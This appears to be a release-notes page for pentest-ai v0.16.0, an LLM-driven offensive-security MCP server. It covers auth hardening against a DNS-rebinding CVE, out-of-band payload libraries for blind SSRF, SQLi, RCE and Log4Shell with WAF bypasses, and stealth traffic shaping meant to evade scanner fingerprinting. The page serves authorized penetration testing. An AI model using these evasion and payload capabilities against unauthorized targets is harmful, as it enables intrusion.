Skip to content

pentest-ai

v0.16.0 Security

This release includes 2 security fixes for security teams reviewing exposed deployments.

✓ No known CVEs patched
Read the diff → Tool health → What is this tool? →
This release patches 2 known CVEs

Topics

ai-security bug-bounty claude ctf security exploit
+12 more
exploit-chaining hacking-tools mcp model-context-protocol nmap offensive-security osint penetration-testing pentest-ai pentesting python vulnerability-scanning

Affected surfaces

auth

ReleasePort's take

Moderate signal
editorial:auto 8d

The release adds per‑install token files and a host allowlist to mitigate CVE‑2025‑49596, which addresses a DNS‑rebinding pivot vulnerability in MCP server authentication. It also introduces several new features across the API surface, CLI behavior, and evidence handling.

Why it matters: CVE‑2025‑49596 (severity 90) is mitigated by adding per‑install token files and host allowlists; operators should apply this release immediately to protect MCP server authentication from DNS‑rebinding attacks.

Summary

AI summary

Updates https://github.com/0xSteph/pentest-ai-extensions, Jinja2/Twig/Freemarker, and HTTP/gopher/dict/ldap across a mixed release.

Changes in this release

Security Critical

Adds per-install token file and host allowlist for MCP auth (closes CVE-2025-49596 DNS-rebinding pivot).

Adds per-install token file and host allowlist for MCP auth (closes CVE-2025-49596 DNS-rebinding pivot).

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds REST adapter at `/v1/*` with health, findings, HTTP request, and evidence endpoints.

Adds REST adapter at `/v1/*` with health, findings, HTTP request, and evidence endpoints.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds `get_findings` filters `url=` and `since=` for incremental querying.

Adds `get_findings` filters `url=` and `since=` for incremental querying.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds `health()` MCP tool returning liveness probe data.

Adds `health()` MCP tool returning liveness probe data.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds CLI agent‑mode parity for evidence collection and proxy passthrough.

Adds CLI agent‑mode parity for evidence collection and proxy passthrough.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds out‑of‑band (Interactsh/OAST) integration for blind vulnerability detection.

Adds out‑of‑band (Interactsh/OAST) integration for blind vulnerability detection.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Implements real `intensity=stealth` traffic shaping: UA rotation, jitter, and upstream proxy passthrough.

Implements real `intensity=stealth` traffic shaping: UA rotation, jitter, and upstream proxy passthrough.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds per‑finding `evidence_artifacts` column and automatic HTTP exchange capture for reproducible proof.

Adds per‑finding `evidence_artifacts` column and automatic HTTP exchange capture for reproducible proof.

Source: llm_adapter@2026-05-26

Confidence: high

Bugfix Medium

Fixes filename collision in `EvidenceCollector` by adding UUID entropy to timestamps.

Fixes filename collision in `EvidenceCollector` by adding UUID entropy to timestamps.

Source: llm_adapter@2026-05-26

Confidence: high

Bugfix Medium

Fixes Ollama provider to honor `OLLAMA_HOST` environment variable.

Fixes Ollama provider to honor `OLLAMA_HOST` environment variable.

Source: llm_adapter@2026-05-26

Confidence: high

Full changelog

Headline release closing 3 of 4 deal-breakers from the pentester-perspective audit shipped on 2026-05-24. Every finding now carries cryptographically-hashed proof, blind-vulnerability classes are detectable via OOB callbacks, and intensity=stealth actually changes traffic shape. Plus the foundations for the Caido / Burp / ZAP plugins coming in subsequent releases.

39 commits since 0.15.3. Smoke verified against the TaskFlow honeypot: 8 findings persisted, 8/8 carry evidence_artifacts, 406/406 on-disk artifacts produce valid curl reproducers, SARIF webRequest/webResponse populated, REST /v1/health + /v1/findings return 200, CLI agent-mode parity confirmed.

Added: plugin-client surfaces (REST adapter + auth hardening)

Foundation for the pentest-ai-extensions repo's Caido / Burp / ZAP plugins.

  • MCP auth: per-install token file + Host: allowlist (mcp_server/auth_local.py). ~/.pentest-ai/mcp-token (0600, fresh secrets.token_urlsafe(32) on first start) gates every SSE/HTTP request via Authorization: Bearer …. Host header allowlist (127.0.0.1 / localhost / ::1 plus the configured bind host) closes the CVE-2025-49596-style DNS-rebinding pivot from a same-host browser. Stdio transport stays auth-less (caller already has process access). ptai mcp --no-auth opts out on trusted hosts; --token-file <path> overrides the location.
  • REST adapter at /v1/* (mcp_server/rest.py). Four routes — GET /v1/health, GET /v1/findings, POST /v1/http_request, GET /v1/evidence — delegate to the existing @mcp.tool() functions via FastMCP's custom_route() decorator. Reuses LocalAuthMiddleware for identical Bearer-token + Host-header enforcement. Lets JVM/JS HTTP clients consume ptai over plain REST instead of SSE+JSON-RPC; foundation for the proxy plugins.
  • get_findings gains url= + since= filters (engine/findings_db.py, mcp_server/server.py). url= is a case-insensitive LIKE match against the target column so a proxy plugin can scope the Findings tab to the URL the user is currently inspecting. since=<iso-ts> lets the tab poll incrementally without re-downloading. Both default to None and combine cleanly with existing severity/status filters.
  • health() MCP tool (mcp_server/server.py). Liveness probe for plugin status indicators. Returns {status, version, timestamp, uptime_seconds, active_engagements} with zero side effects; never raises (degrades to active_engagements=0 when the DB is unreachable).

Added: CLI agent-mode parity for evidence + proxy passthrough

  • ptai start agent-mode path (engine/agents/handlers/registry_bridge.py) now populates session._ptai_extras with engagement_id + an EvidenceCollector (rooted at $PENTEST_EVIDENCE_DIR) + an optional proxy from PTAI_UPSTREAM_PROXY, then drains the pending-evidence buffer onto every emitted finding via _attach_pending_evidence_to_findings(session, findings). Closes the carry-forward from Phase 1: every CLI-driven probe now carries evidence_artifacts the same way MCP-driven probes do. Intensity-derived stealth knobs (UA rotation, jitter) on the CLI path deferred — WorkingMemory doesn't carry intensity today; small refactor follows when needed.

Added: out-of-band collaborator (Interactsh / OAST) integration

Phase 4 of the pentester-first roadmap closes audit deal-breaker #2 — blind-vulnerability classes (blind SSRF, blind SQLi, blind XXE, blind stored XSS, SSTI, Log4Shell) are now detectable.

  • engine/oob/ package — async Interactsh client. Generates RSA-2048 keypair per engagement, POST /register to the configured server, polls GET /poll, decrypts each interaction RSA-OAEP-SHA256-wrapped AES-CTR-256 (IV = first 16 bytes). Wire format verified against github.com/projectdiscovery/interactsh. Defaults to https://oast.fun, accepts any self-hosted server via --oast-server.
  • pending_oob table (engine/findings_db.py) — parks finding templates at probe-fire time; persists across MCP restarts so late-arriving callbacks don't lose their trail. Indexed by engagement, status, and payload subdomain for O(1) interaction → probe lookup.
  • Curated payload library (engine/oob/payloads.py) — per-vuln-class payload templates with {OAST} placeholders: blind SSRF (HTTP/gopher/dict/ldap), blind SQLi per DBMS (MySQL/Postgres/MSSQL/Oracle), blind XXE (two-stage DTD + SVG), blind RCE (curl/wget/nslookup/dig + Windows variants + base64-wrapped WAF bypass), blind stored XSS (5 shapes), SSTI (Jinja2/Twig/Freemarker), Log4Shell (jndi:ldap/dns/rmi + ${lower:} bypass).
  • poll_oob MCP tool — the LLM driving ptai over MCP calls this after firing OOB-enabled probes. Polls the collaborator up to timeout=60 seconds (capped at 300, configurable), matches arriving interactions back to their pending rows via find_pending_oob_by_full_id, materializes the finding with the interaction record (timestamp, source IP, raw bytes) as an on-disk evidence artifact via the Phase-1 collector, flips the pending row to matched. Stale rows past their expires_at get bulk-moved to expired.
  • Probe wirings — SSRF (web.ssrf_cloud_metadata), blind SQLi (web.sqli_fuzz), XXE (web.xxe_upload), stored XSS (web.stored_xss) all fire OAST payloads when engagement_id is present in session extras. Bounded fan-out: one OOB-fire per discovered endpoint/path so request volume stays sane. Blind-RCE wiring deferred — no general command-injection probe exists today; the payloads ship for when one lands.
  • CLI flagsptai start --oast-server URL / --oast-token T / --no-oast. Sets PTAI_OAST_SERVER / PTAI_OAST_TOKEN / PTAI_NO_OAST=1 for the engagement.
  • Privacy disclosure in README under Responsible Use — encrypted-payload + server-side-metadata model, when to self-host (paid engagements / programs forbidding third-party collaborator infra), how to disable entirely.

End-to-end verified by a test (tests/test_oob_end_to_end.py) that stands up a mock Interactsh server on a loopback port, exercises register_oob_probe → mock-/register → pending_oob → mock-/poll-with-real-encryption → poll_oob → materialized finding with on-disk OOB evidence artifact carrying the interaction's source IP. 346 / 346 across the full Phase 1 + Phase 2 + Phase 4 regression sweep.

Added: real intensity=stealth implementation

The intensity=stealth knob had been advertised on the engagement schema since 0.15.0 but only changed rate-limit behavior. Now it actually changes traffic shape — closing the credibility-gap deal-breaker from the pentester audit.

  • Curated UA pool with per-call rotation (engine/probes/primitives.py). 7 modern UAs (Chrome / Firefox / Safari across Windows / Mac / Linux / Android / iOS) selected at random per HTTP call when stealth is on. WAF / scanner fingerprinters can't pin a single engine.
  • Per-request jitter (engine/probes/primitives.py). asyncio.sleep of random.uniform(min_ms, max_ms) / 1000 before every outbound call when stealth is on (default window 250–1500 ms). Concurrent probe waves stop bursting the target.
  • Upstream proxy passthrough (engine/probes/primitives.py + mcp_server/probes.py). Every HTTP call honors extras["proxy"], populated from the PTAI_UPSTREAM_PROXY env var or the new --upstream-proxy CLI flag. Lets pentesters route ptai through Burp / Caido for live inspection at any intensity — ptai start http://target --upstream-proxy http://127.0.0.1:8080.
  • Stealth knobs wired into MCP run_probe (mcp_server/probes.py). When the engagement intensity is stealth, run_probe populates session extras with ua_rotation=True, jitter_ms=(250, 1500). http_request always honors PTAI_UPSTREAM_PROXY.

Active on the MCP path today. CLI agent-mode + legacy orchestrator wiring still tracked separately.

Added: per-finding evidence bundle

The headline change. Every finding now ships with cryptographically-hashed proof of the HTTP exchange that produced it — closing the "AI slop" reproducibility deal-breaker that's caused multiple bug-bounty programs to deprioritize LLM-driven reports through 2025-2026.

  • evidence_artifacts column on findings table (engine/findings_db.py). JSON list of {artifact_id, type, sha256, filename, method, url, status_code} summaries pointing at the on-disk exchanges. Migration via the existing _add_column_if_missing() pattern with a '[]' default so old rows read as an empty list.
  • HTTP capture in the primitives chokepoint (engine/probes/primitives.py). Every http_get / http_post_json / http_post_form / http_put_json call through the primitives layer now persists its request + response to disk and appends a summary to a per-session pending buffer when an EvidenceCollector is attached via _ptai_extras. Existing probes get evidence for free with zero probe-side changes.
  • MCP run_probe collector wiring + orchestrator auto-attach (mcp_server/probes.py). Constructs an EvidenceCollector rooted at $PENTEST_EVIDENCE_DIR/<engagement_id>/, attaches it plus engagement_id to the probe's session, then after the probe returns its findings drains the pending buffer and auto-attaches the artifact summaries to every emitted finding that didn't set its own evidence_artifacts.
  • MCP http_request capture parity (mcp_server/probes.py). The LLM's raw-HTTP escape hatch now captures its exchange and returns the artifact summary in the response dict under evidence_artifacts.
  • SARIF v2.1.0 DAST webRequest / webResponse (engine/sarif.py). When a finding carries an http_request artifact, the SARIF result populates the DAST extension fields. GitHub Code Scanning's Security tab now renders the captured exchange inline with each finding.
  • request_to_curl() utility (engine/evidence.py). POSIX-shell-safe curl one-liner builder; used by the report renderer and by get_evidence(as_curl=True).
  • Enhanced MCP get_evidence (mcp_server/server.py). Adds include_content (returns raw bytes), as_curl (parses http_request artifacts and emits a copy-pasteable curl), and always returns the on-disk SHA-256 so callers can detect tampering by comparing against the hash stored in the finding's evidence_artifacts field.
  • Per-finding "Evidence bundle" section in HTML / PDF reports (agents/report/templates/report.html.j2, agents/report/renderer.py). Collapsible <details> block per finding listing each captured exchange's method/URL/status, SHA-256, and on-disk filename. The renderer tolerates both already-parsed lists and JSON-encoded strings from DB rows.

Smoke verified against the local TaskFlow honeypot (port 4000): web.api_path_discovery emitted 8 findings, 8/8 carried evidence_artifacts, 405/405 on-disk artifacts produced valid curl repros via get_evidence(as_curl=True). End-to-end integration test in tests/test_evidence_integration_e2e.py walks the same loop against a synthetic loopback target on every CI run.

Wiring still TODO for the standalone CLI agent-mode + legacy orchestrator paths (cli/main.py); the MCP path — the recommended way to drive ptai per docs/ARCHITECTURE.md — is fully wired.

Fixed

  • Filename collision in EvidenceCollector (engine/evidence.py). _safe_timestamp() had second-granularity, so concurrent probe HTTP calls within the same second collided on filename and overwrote each other's captured exchanges. Now includes 8 hex chars of uuid4 entropy in the suffix. Surfaced by the new end-to-end test under web.api_path_discovery (~100 requests in <1 s).
  • Ollama provider now honors OLLAMA_HOST (engine/llm/factory.py). The factory previously read only OLLAMA_BASE_URL, so users following the official Ollama docs (which use OLLAMA_HOST as the canonical env var) had their setting silently ignored, fell back to http://localhost:11434, and the agent loop hung on the 300 s HTTP timeout before exiting. Now reads OLLAMA_HOST first, then OLLAMA_BASE_URL as a back-compat alias. Closes #12.

Security Fixes

  • MCP auth token file + Host header allowlist closes CVE‑2025‑49596‑style DNS rebinding pivot
  • CVE-2025-49596

Weekly OSS security release digest.

The CVE patches and breaking changes that affected production tools this week. One email, every Sunday.

No spam, unsubscribe anytime.

Share this release

Track pentest-ai

Get notified when new releases ship.

Sign up free

About pentest-ai

Offensive-security MCP server with 205 wrapped tools, 17 specialist agents, and 60 SPA-aware probes for OWASP Top 10. CLI + MCP, BYO LLM. No API key needed on MCP path.

All releases →

Related context

Related CVEs

Beta — feedback welcome: [email protected]